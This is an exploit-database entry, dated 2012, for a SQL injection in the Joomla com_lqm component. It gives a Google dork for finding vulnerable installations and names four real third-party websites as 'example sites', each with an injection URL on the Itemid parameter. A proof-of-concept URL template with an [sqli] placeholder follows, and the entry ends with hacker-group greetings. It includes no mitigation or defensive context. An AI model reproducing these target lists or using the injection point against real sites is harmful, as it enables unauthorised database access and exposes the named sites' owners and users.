joomla component (com_lqm) SQL injection Vulnerability



EKU-ID: 1901 CVE: OSVDB-ID:
Author: xDarkSton3x Published: 2012-04-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Exploit Title: joomla component (com_lqm) SQL injection Vulnerability
#Developer: Not Registered
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Google dork: inurl:"index.php?option=com_lqm"
# Example Sites :
http://www.chasehost.net/rcc/index.php?option=com_lqm&query=68&name=jsession_test&Itemid=%27
http://www.embaperu.ch/index.php?option=com_lqm&8a60248c75245fcd51919a0ced0df5b1=1&task=showResults&query=20&lqm_Year=%s&&Itemid=%27
http://maprunner.org.uk/index.php?option=com_lqm&8a60248c75245fcd51919a0ced0df5b1=1&task=showResults&query=20&lqm_Year=%s&&Itemid=%27
http://www.madisoncountyky.us//index.php?option=com_lqm&query=68&name=jsession_test&Itemid='
##################################################

[~]Exploit/p0c :
http://site.com/index.php?option=com_lqm&query=68&name=jsession_test&Itemid=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team  -  DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ]